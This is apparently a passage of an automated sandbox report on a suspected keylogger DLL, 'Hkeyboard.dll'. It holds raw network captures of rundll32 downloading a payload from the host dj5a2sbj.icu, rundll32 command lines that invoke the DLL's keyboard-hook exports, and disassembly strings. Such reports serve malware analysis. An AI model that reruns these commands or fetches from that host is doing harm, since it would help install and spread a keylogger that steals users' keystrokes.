l+BmJ4)XaAU:JD-:O_Zo.H)E]/T]=eJ2zw^)5Dxs[a1pHC}ZbFr~&u{z@3_OveG+BgL!EG'm8gN;mbhSy35!{r,0[
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: c7 7a a8 94 91 d1 d0 4e b0 e0 36 55 e7 ed df eb 27 29 99 71 88 3c b0 9a 4b 02 99 64 7e 1a 5d 40 22 21 a9 97 ed a4 5f d9 d8 cd 1c 8c 1a 26 3e d7 f4 ef 17 99 32 ac 69 81 cd a4 b2 a7 7c c8 a5 53 d2 dc 75 f5 64 00 3e 70 d9 a2 be bd 60 a1 88 2c ac 3b 21 b5 00 86 04 31 37 4e 37 33 99 1a 19 a0 06 10 7a e8 b8 51 2c 71 e7 6d 89 5c 7f 64 d1 7f e4 b4 ae 6d fe 7e ca 6e 73 ef 3c 52 73 ce 0e 0c 0f 4d bb 5c ba 88 04 47 17 63 79 3d aa be 5a 5f d0 97 13 62 28 03 fb 7b 74 04 7b c4 c7 79 59 a9 f0 b1 b7 cd e1 77 97 ca f5 08 f3 90 3d d4 5e 30 16 2d ab ef d3 82 50 a8 ac fb 71 c7 1f 35 e4 ec 45 96 e7 f1 7f 75 6e cb 39 42 15 c1 25 8b 88 33 9a 21 b8 ad cb 3f 7b 17 8b 0f 64 4d b3 ad 36 98 e3 d5 13 b4 df 12 ad 96 d2 2e 12 f9 6a 27 b8 8b eb 47 81 2d f2 76 de 4b c2 8e 39 d6 d6 56 01 Data Ascii: zN6U')q<Kd~]@"!_&>2i\|Sud>p`,;!17N73zQ,qm\dm~ns<RsM\Gcy=Z_b({t{yYw=^0-Pq5Eun9B%3!?{dM6.j'G-vK9V
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 26 62 4d d1 be 75 b8 4a 20 9f a1 38 3d 90 83 c6 9a 08 92 44 a1 ed 83 1c d6 0a 36 51 64 62 d5 dd f8 af 84 fd 61 e6 99 b1 e9 a9 d9 fb cd 6f 32 26 43 94 64 af e4 f4 6b 65 f1 b6 56 98 de 7b a4 c0 5f e4 64 2e 1f 75 3a d8 7c 8b c5 ca 67 f3 78 a0 28 b6 b4 4d 4b db 6d 9a d7 85 14 85 8d dc 33 e3 06 42 33 d5 51 5f 6a ea 15 ec b9 25 fa d7 70 8e b2 c0 6c 84 53 01 27 c4 da ba 6f d0 02 a9 36 a4 88 98 06 8c 54 53 37 f4 a7 f2 65 57 b6 1e 19 c3 3f 8e 1d a4 79 7f f7 63 ad 02 5f 12 9c c4 36 a1 e0 cd 3e dd 15 99 e6 03 c3 73 74 ad 31 42 74 eb 91 ae 38 12 a7 1e 00 95 32 f9 28 46 89 df fc 51 b1 35 1e 64 42 c5 02 c3 d0 c5 6a 20 f1 05 15 76 06 a6 36 6e 39 1c ce 19 08 dd d2 28 82 b6 f1 84 1b e7 86 cd 35 72 ae b7 02 81 15 cb 1d 97 f1 fb 94 37 44 25 87 52 54 6f 55 e2 72 b2 6e 2c 8f Data Ascii: &bMuJ 8=D6Qdbao2&CdkeV{_d.u:\|gx(MKm3B3Q_j%plS'o6TS7eW?yc_6>st1Bt82(FQ5dBj v6n9(5r7D%RToUrn,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49726	104.21.40.214	443	2536	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 13:48:12 UTC	68	OUT	GET /yj/update.xml HTTP/1.1 Host: www.dj5a2sbj.icu Accept: /
2024-12-19 13:48:13 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:48:13 GMT Content-Type: text/xml Content-Length: 320512 Connection: close Last-Modified: Sun, 15 Dec 2024 02:29:11 GMT ETag: "675e3ef7-4e400" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mihVhZq9GIwZ7%2BqtFDR4krYwwNIa0KDh07iwCUDcyx4HtpDmuFFib5XuFniGInbgCulw3dvuBza8wkmN0WereRjkVCLtMM3zA6aS0z7re5H2yK6sZEYKKndpsIJbQo2HTDbD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f47d955ba6bde95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1586&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=706&delivery_rate=1798029&cwnd=240&unsent_bytes=0&cid=0814044d37013961&ts=895&x=0"
2024-12-19 13:48:13 UTC	516	IN	Data Raw: 28 a9 62 b7 f0 dc 23 d2 c5 a4 e7 83 c2 45 95 3d 09 a5 20 1e ae f5 1e 4a 14 cb 38 85 1e 36 36 57 30 4f 47 bb b8 e2 88 c2 e6 e9 79 08 bd b2 d0 2e 2d 75 ee e4 f6 03 05 0b 9d bf c6 c2 87 a1 c1 3c 17 fd 24 58 53 ad 5e 29 49 89 7a a0 fc a9 89 a8 82 3f b6 7c a2 4a d7 d7 2b 4c ab 40 8a 53 2d 7f b9 7b a5 46 ab ef 0b 32 21 ad e5 1c 32 8c 26 33 b3 8c b3 73 f6 9c 14 a0 ad 84 37 91 ca 53 e5 a1 6f 54 38 d1 41 9a 5a aa 66 7f d0 16 3a e1 b6 43 58 37 4b be b1 10 0d d0 73 80 9e 76 0a da 3e c6 26 fe d4 03 58 0b ba dc 95 80 22 80 92 35 73 9f e6 a6 48 0a 45 52 6b e4 5e 93 00 b3 46 43 ed 99 86 a4 79 41 d0 54 de 34 31 0c 3c 55 ea e3 0c 13 9f db 58 ee 56 25 c7 0f 81 a5 b3 57 ce dd cc 15 02 d0 5b 57 d2 c1 ad 05 ad 4f 5a 6b 62 61 b6 86 5c f9 71 8f 94 18 d0 ba 08 bb c1 28 5e 3d a8 Data Ascii: (b#E= J866W0OGy.-u<$XS^)Iz?\|J+L@S-{F2!2&3s7SoT8AZf:CX7Ksv>&X"5sHERk^FCyAT41<UXV%W[WOZkba\q(^=
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 14 2c 5a d6 f6 eb 4a 89 f4 4e 6c 51 f5 2f 93 a1 2a e8 60 ad a7 7f 2b 14 9b 57 a0 d4 ca 24 cb 34 21 c4 aa 0e 83 bc 8e bb 9e 59 ce a0 f2 42 cb 8b 1d 9e 7a 03 5f 0d 1b 10 eb e1 7c 4e f5 e6 6d 53 66 56 d1 87 16 dd 72 b2 3f 2f 01 e2 b6 47 7d 1d d7 79 bc 5c bf d7 c4 b4 84 f7 c3 57 48 c7 79 66 e7 12 11 41 d6 a0 2b 80 1d 65 8e c7 49 36 cd d9 9c a8 3d 82 22 4e 2b c1 8b d2 30 64 d4 00 80 21 82 29 22 1b b1 4b ae 5c 99 c0 f5 fa b1 71 48 7d ef 2b f6 db df 3d d1 b7 76 7e 5e 55 e0 c1 09 b6 f8 c2 82 4b ba f1 e4 7d 9d 72 df e9 3e 0c 52 7a f5 83 2d 28 ad 73 87 08 78 ea 6d f9 4f 63 da 5d 36 84 fe e9 bc 20 70 07 ec 15 73 12 ef 06 26 ad 4f 33 59 ff fe de ae 50 d0 78 54 71 9c 36 9a 97 45 75 a6 42 ae b1 89 8a e1 cc e3 b3 ae 20 c4 21 6d 3c fc 92 da db 92 8d 31 cb 53 26 a0 b1 b9 Data Ascii: ,ZJNlQ/*`+W$4!YBz_\|NmSfVr?/G}y\WHyfA+eI6="N+0d!)"K\qH}+=v~^UK}r>Rz-(sxmOc]6 ps&O3YPxTq6EuB !m<1S&
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 18 5f 5c 3a 58 5e 1d a1 2e 1d a1 56 60 ad f3 a8 89 64 c7 18 34 fe 0d 7d 2c cf 0b 1e 05 5d 9b 8f 32 a2 b6 c6 a4 6c db 35 b5 86 9e 7f c9 b3 1d 58 5c ad 3e b1 99 6b ca b1 8d a6 1f 35 cc d0 41 46 0a ed 07 d4 0e 8e c2 9a 43 16 7b 92 d4 22 43 f8 a4 73 65 8a ab f6 ad 0c 9c 86 02 8a 42 f4 91 c6 4d df 7f bb c5 00 53 89 85 4f 1a fe 8f 0b 57 2e db f1 b1 f0 9f 9a 45 bf 17 de 8f 06 cc 42 31 a8 c2 28 f9 b2 b1 d0 84 f0 d9 ad cf 22 b5 6b 64 c7 48 e1 df d8 e5 2e 4a 89 60 cf 00 ae bc 0f 4f c4 d2 03 85 37 2f 56 46 92 34 5c a1 e4 4f d7 48 e5 38 cc 86 1c 98 5e 31 b1 86 bf 0b bc b8 14 66 6f 9b dc b1 17 08 9a 6f f0 5b 95 2a 08 3b 93 9d 73 36 8f e6 63 5e aa a5 0e 64 d8 f2 f5 b8 ed 2d 23 45 de f5 29 d9 c4 91 98 f2 65 9e ee f5 6e 9f 35 2d cb 7a a3 46 d0 14 31 eb 0a 7d a1 cc 53 9b Data Ascii: _\:X^.V`d4},]2l5X\>k5AFC{"CseBMSOW.EB1("kdH.J`O7/VF4\OH8^1foo[*;s6c^d-#E)en5-zF1}S
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: c1 38 c0 a3 08 3d 65 2c 06 3b 5c dc 2f cf 16 51 9a 03 73 13 2e c5 e5 0a 56 82 17 45 d1 dc 01 9e 2d 19 20 fc 41 c8 24 72 e4 63 30 74 dc a0 a6 80 4a 16 4d 1a d9 38 05 ff ef 32 6b 94 4f c5 95 de 7d 9e 9e 0f fd 33 e0 7b 41 de 20 73 bd 61 fd af e5 88 47 0e af 5b 97 37 b4 d1 b5 4f 64 c9 84 3d 98 c2 37 a9 35 9f 6a 75 f0 e4 4e 9a d5 9a 8f a8 6d ff de 59 4f 7a 30 be 02 10 b2 ea 54 d5 05 90 da f2 94 64 19 67 3f 68 9f 7d 05 80 30 af 84 85 3e 09 e2 68 30 0f 5a 86 f0 72 1e c5 96 05 a4 92 28 70 88 a3 26 81 2c e1 d6 64 64 4c 18 5c ab c7 6a e0 7c c0 2b 70 4d 51 07 f9 f3 35 8f 26 bb 07 91 fe 97 5c 10 ed 0e 44 5e aa 4a d3 8b f1 9c 96 d4 d9 f9 87 24 2d 87 f6 f4 56 65 b9 f0 36 e6 28 52 86 30 4c cf 39 19 ba 89 ac 50 48 78 3e 3c c3 6d 29 17 4a ff b6 57 cb d0 44 98 60 92 c8 0a Data Ascii: 8=e,;\/Qs.VE- A$rc0tJM82kO}3{A saG[7Od=75juNmYOz0Tdg?h}0>h0Zr(p&,ddL\j\|+pMQ5&\D^J$-Ve6(R0L9PHx><m)JWD`
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 24 3a 52 77 59 28 4a 18 72 a6 4b 6d c0 1f 87 ff 0a b0 ba e0 aa 80 07 df e8 ac 1c 59 30 32 18 a2 41 df ef c6 92 ad 52 47 d3 4e 21 66 c2 b5 8f 25 ff 2d 10 35 f7 a5 78 c9 36 3d 1a 59 bf 30 d2 54 03 e5 c3 b9 b2 7d 04 58 6c 28 f6 c4 1a 8a b8 4a d7 a8 f5 fd 1b e1 0c 43 29 ac a0 eb cf ba d7 f2 88 a3 bf e1 ea eb e1 71 8d f2 a0 64 17 fd 51 bd bb 36 fe de c4 3d c4 8b 72 f0 c9 66 45 91 f0 95 17 89 aa ac f1 bd c5 d6 ec 99 96 2a 01 74 86 42 45 a2 d6 00 0f 4b 7c 86 3c 3b 83 72 a0 65 be e9 3b ab 3d 99 cb cb 37 66 5b ef e2 82 05 aa 6a a5 9c ba a0 85 03 2f 13 f4 fd ed 19 14 53 05 9e 19 88 b2 94 5f e8 ee 83 0a a4 70 fa f2 6d 16 01 84 4d a1 fb 23 24 b3 d0 8a e4 2d 4f e1 b7 ad b4 28 ca 86 48 29 3e 34 8a 3d 2f ce 1e ad 73 1f 6b 23 31 a6 e1 2e 4f cc 47 48 8b 26 61 39 1f c4 7f Data Ascii: $:RwY(JrKmY02ARGN!f%-5x6=Y0T}Xl(JC)qdQ6=rfE*tBEK\|<;re;=7f[j/S_pmM#$-O(H)>4=/sk#1.OGH&a9
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: f0 a4 4b 57 b6 7f 63 30 e2 0c a5 b4 73 c1 bc 60 41 a8 43 1c 39 32 ce 37 39 d0 a1 b1 d4 4c 96 43 98 7e 81 3d 2c 18 35 b2 56 66 89 dc 24 e2 6c f2 c8 45 0f 1e 76 71 e0 0a ff 42 32 1a 92 38 24 45 cf 93 4c 04 57 e9 c9 c9 42 61 58 60 32 b1 3b 77 d4 e5 ef 30 ff a5 b2 dd e4 37 2a 2d eb e2 5f df 80 37 74 1a 6d fb 9e 11 d4 46 56 13 a8 4a 69 59 2e 3c 71 ca fd 44 46 00 60 96 86 c9 a5 c9 dc 05 ad c9 47 29 2b a7 52 db dc 85 fa fe e8 2b c6 88 50 2c c6 ea 9a ab 34 8a 5d 3e 1b ef 32 2c d2 d1 bf 55 20 5e 0a 19 f3 72 fd c7 07 50 30 fa c5 42 b3 35 67 0e e0 04 c7 c5 18 d4 27 fb b1 0d b9 27 9c f1 e9 a9 9c 44 89 1b 09 ee a4 af c5 40 0e 1a b9 00 9d bd 19 b8 2c 5b 4b 9f 69 8e 9c 22 be fc c7 b5 de 11 df b0 fa 01 7d 0f 13 0f f1 91 5d 9f 8b 5c aa a5 8b dc 44 25 46 32 14 ca 8e 4e 44 Data Ascii: KWc0s`AC9279LC~=,5Vf$lEvqB28$ELWBaX`2;w07*-_7tmFVJiY.<qDF`G)+R+P,4]>2,U ^rP0B5g''D@,[Ki"}]\D%F2ND
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 75 cf 36 28 b6 ac af c2 4a 17 0c de 46 d0 d0 52 ff 94 12 b0 6b f1 6e 8e 61 9e 50 dd 40 12 d6 f1 67 ff ee 9d 3e 27 cc 95 0b fb d2 1b 08 1a 1a 1c f5 b3 b8 60 cc e5 f7 a4 63 dc 15 fa 76 68 09 a0 8b 58 87 96 0a fa a4 fc a5 d5 44 23 4b bc 06 81 82 84 67 b4 89 11 1d 67 77 59 9a 3f 70 f7 00 f7 44 d9 49 64 cb 21 1a 09 a5 44 38 5d eb 8a 86 83 53 1c b9 50 3f 66 9e 80 fb b5 fc f8 90 d0 4b 8a 68 08 6a d6 32 82 13 94 44 de 76 45 2f e7 46 21 02 30 51 90 89 33 bf 51 c0 83 fc a2 e5 22 ab 5b 8c b9 47 55 5d bc 8e 54 65 16 c6 0c 34 63 57 d4 84 d1 4e 36 ba 05 d5 88 56 f3 80 25 a4 ae 22 b2 1d 41 9c 13 a0 3a 8b a4 53 b5 f9 32 14 ab 4a 94 96 93 84 ef e8 1d 4a cb 4b 2e bc de 14 a0 8b c5 0e 75 86 8d 52 6b eb 35 5b ff 90 84 64 47 29 3c 38 a8 40 c1 2f 4d cd 2b 84 e3 e4 f2 38 7e cb Data Ascii: u6(JFRknaP@g>'`cvhXD#KggwY?pDId!D8]SP?fKhj2DvE/F!0Q3Q"[GU]Te4cWN6V%"A:S2JJK.uRk5[dG)<8@/M+8~
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 6c b2 e6 2b a5 42 6d 04 17 4a 34 b2 94 df 07 29 58 df a6 cd a9 01 d5 1a c1 61 e6 b9 41 ed 55 3a d2 d2 4a b9 44 ff a4 e1 2d d7 e6 3a 4f 5f 07 5a 96 6f 9d b2 2e fb 05 84 07 9f 48 b9 0f 0d 29 45 dd 5d 2f 54 5d c6 bb 3d 1f 01 65 4a 32 e4 9b df 7a 89 77 5e 29 02 b4 35 e1 c4 44 09 78 0a f8 b5 a6 73 f1 d9 5b d4 61 87 31 cc a6 8c e6 f8 70 ed 9b 48 b4 c4 e1 b0 d9 ef 8b 43 7d 5a 15 a7 f3 62 46 72 8f 00 ff 80 cd 0f ba 7e 8a c2 f4 26 c9 1b 10 75 a8 fb 19 02 9b c9 0c 7b 7a be 13 40 33 f3 5f 4f 76 c2 65 47 2b 42 ab d0 98 e5 83 ad 9a 67 4c 21 97 bc a1 14 10 84 a1 0f 45 c7 47 d2 ff ee 9e b6 d4 27 ae 8c 6d a4 86 b8 38 67 4e 8d 3b d9 6d be cd 62 92 68 53 e6 ab a4 79 33 b2 de a1 35 a2 21 7b e8 72 2c cc a0 9d 08 30 d3 1f d1 dd 9a e6 12 bb 0f d4 bc ff 5b 85 9b 91 b7 32 02 e7 Data Ascii: l+BmJ4)XaAU:JD-:O_Zo.H)E]/T]=eJ2zw^)5Dxs[a1pHC}ZbFr~&u{z@3_OveG+BgL!EG'm8gN;mbhSy35!{r,0[2
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 91 d1 d0 4e b0 e0 36 55 e7 ed df eb 27 29 99 71 88 3c b0 9a 4b 02 99 64 7e 1a 5d 40 22 21 a9 97 ed a4 5f d9 d8 cd 1c 8c 1a 26 3e d7 f4 ef 17 99 32 ac 69 81 cd a4 b2 a7 7c c8 a5 53 d2 dc 75 f5 64 00 3e 70 d9 a2 be bd 60 a1 88 2c ac 3b 21 b5 00 86 04 31 37 4e 37 33 99 1a 19 a0 06 10 7a e8 b8 51 2c 71 e7 6d 89 5c 7f 64 d1 7f e4 b4 ae 6d fe 7e ca 6e 73 ef 3c 52 73 ce 0e 0c 0f 4d bb 5c ba 88 04 47 17 63 79 3d aa be 5a 5f d0 97 13 62 28 03 fb 7b 74 04 7b c4 c7 79 59 a9 f0 b1 b7 cd e1 77 97 ca f5 08 f3 90 3d d4 5e 30 16 2d ab ef d3 82 50 a8 ac fb 71 c7 1f 35 e4 ec 45 96 e7 f1 7f 75 6e cb 39 42 15 c1 25 8b 88 33 9a 21 b8 ad cb 3f 7b 17 8b 0f 64 4d b3 ad 36 98 e3 d5 13 b4 df 12 ad 96 d2 2e 12 f9 6a 27 b8 8b eb 47 81 2d f2 76 de 4b c2 8e 39 d6 d6 56 01 00 b3 9b 2b Data Ascii: N6U')q<Kd~]@"!_&>2i\|Sud>p`,;!17N73zQ,qm\dm~ns<RsM\Gcy=Z_b({t{yYw=^0-Pq5Eun9B%3!?{dM6.j'G-vK9V+
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: be 75 b8 4a 20 9f a1 38 3d 90 83 c6 9a 08 92 44 a1 ed 83 1c d6 0a 36 51 64 62 d5 dd f8 af 84 fd 61 e6 99 b1 e9 a9 d9 fb cd 6f 32 26 43 94 64 af e4 f4 6b 65 f1 b6 56 98 de 7b a4 c0 5f e4 64 2e 1f 75 3a d8 7c 8b c5 ca 67 f3 78 a0 28 b6 b4 4d 4b db 6d 9a d7 85 14 85 8d dc 33 e3 06 42 33 d5 51 5f 6a ea 15 ec b9 25 fa d7 70 8e b2 c0 6c 84 53 01 27 c4 da ba 6f d0 02 a9 36 a4 88 98 06 8c 54 53 37 f4 a7 f2 65 57 b6 1e 19 c3 3f 8e 1d a4 79 7f f7 63 ad 02 5f 12 9c c4 36 a1 e0 cd 3e dd 15 99 e6 03 c3 73 74 ad 31 42 74 eb 91 ae 38 12 a7 1e 00 95 32 f9 28 46 89 df fc 51 b1 35 1e 64 42 c5 02 c3 d0 c5 6a 20 f1 05 15 76 06 a6 36 6e 39 1c ce 19 08 dd d2 28 82 b6 f1 84 1b e7 86 cd 35 72 ae b7 02 81 15 cb 1d 97 f1 fb 94 37 44 25 87 52 54 6f 55 e2 72 b2 6e 2c 8f 6b 4d dd d0 Data Ascii: uJ 8=D6Qdbao2&CdkeV{_d.u:\|gx(MKm3B3Q_j%plS'o6TS7eW?yc_6>st1Bt82(FQ5dBj v6n9(5r7D%RToUrn,kM

Target ID:	0
Start time:	08:48:10
Start date:	19/12/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\Hkeyboard.dll"
Imagebase:	0xc20000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:48:10
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:48:10
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:48:10
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	08:48:10
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:48:13
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?SetDisablePrintScreen@@YAXH@Z
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:48:14
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\dllhost.exe
Wow64 process (32bit):	true
Commandline:	dllhost.exe
Imagebase:	0xf0000
File size:	19'256 bytes
MD5 hash:	6F3C9485F8F97AC04C8E43EF4463A68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	08:48:16
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?UnInstallKBHook@@YAHXZ
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:48:18
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:48:19
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?InstallKBHook@@YAHXZ
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:48:19
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?SetDisablePrintScreen@@YAXH@Z
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:48:19
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?UnInstallKBHook@@YAHXZ
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:48:26
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: rundll32.exePID: 7724, Parent PID: 4004

General

Target ID:	19
Start time:	08:48:34
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Disassembly

Reset < >

Analysis Process: rundll32.exePID: 5632, Parent PID: 3428COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	28.8%
Signature Coverage:	13.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	55

Executed Functions

Function 6D01E506 Relevance: 99.0, APIs: 17, Strings: 39, Instructions: 1037COMMON

Download Yara Rule

Strings

TLS_AES_256_GCM_SHA384, xrefs: 6D01ED0E
Users, xrefs: 6D01E6B9
SCH_USE_STRONG_CRYPTO, xrefs: 6D01F172
AES, xrefs: 6D01EF5E, 6D01EFEB
Unable to set ciphers to from connection ssl config, xrefs: 6D01F1CA
TLS_AES_128_CCM_SHA256, xrefs: 6D01EE52
, xrefs: 6D01EF22
(memory blob), xrefs: 6D01E7F2, 6D01E803, 6D01E930, 6D01EB30, 6D01EB4B, 6D01EB8A
CurrentUserGroupPolicy, xrefs: 6D01E6D3
schannel: certificate format compatibility error for %s, xrefs: 6D01E804
TLS_AES_128_GCM_SHA256, xrefs: 6D01ED59
SHA256, xrefs: 6D01EFE1
Cipher name too long, not checked., xrefs: 6D01EEC2
LocalMachineGroupPolicy, xrefs: 6D01E6ED
Services, xrefs: 6D01E69F
LocalMachine, xrefs: 6D01E665
P12, xrefs: 6D01E7DC
schannel: TLS 1.3 not supported on Windows prior to 11, xrefs: 6D01E607
All available TLS 1.3 ciphers were disabled., xrefs: 6D01EEFE
Microsoft Unified Security Protocol Provider, xrefs: 6D01F21F
TLS_CHACHA20_POLY1305_SHA256, xrefs: 6D01EDAA
TLS_AES_128_CCM_8_SHA256, xrefs: 6D01EDFE
USE_STRONG_CRYPTO, xrefs: 6D01F15E
schannel: Failed to import cert file %s, last error is 0x%x, xrefs: 6D01EB4C
schannel: AcquireCredentialsHandle failed: %s, xrefs: 6D01F254
schannel: Failed to import cert file %s, password is bad, xrefs: 6D01EB31
CurrentUser, xrefs: 6D01E648
Passed in an unknown TLS 1.3 cipher., xrefs: 6D01EEAA
CurrentService, xrefs: 6D01E682
SHA384, xrefs: 6D01EFDC
$, xrefs: 6D01F062
@, xrefs: 6D01EF83
schannel: Failed to read cert file %s, xrefs: 6D01EAC0
LocalMachineEnterprise, xrefs: 6D01E707
schannel: Failed to open cert store %x %s, last error is 0x%x, xrefs: 6D01E854
, xrefs: 6D01EFC4
schannel: Failed to get certificate from file %s, last error is 0x%x, xrefs: 6D01EB8B
schannel: unable to allocate memory, xrefs: 6D01EBCA
schannel: Failed to get certificate location or file for %s, xrefs: 6D01F2A1

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
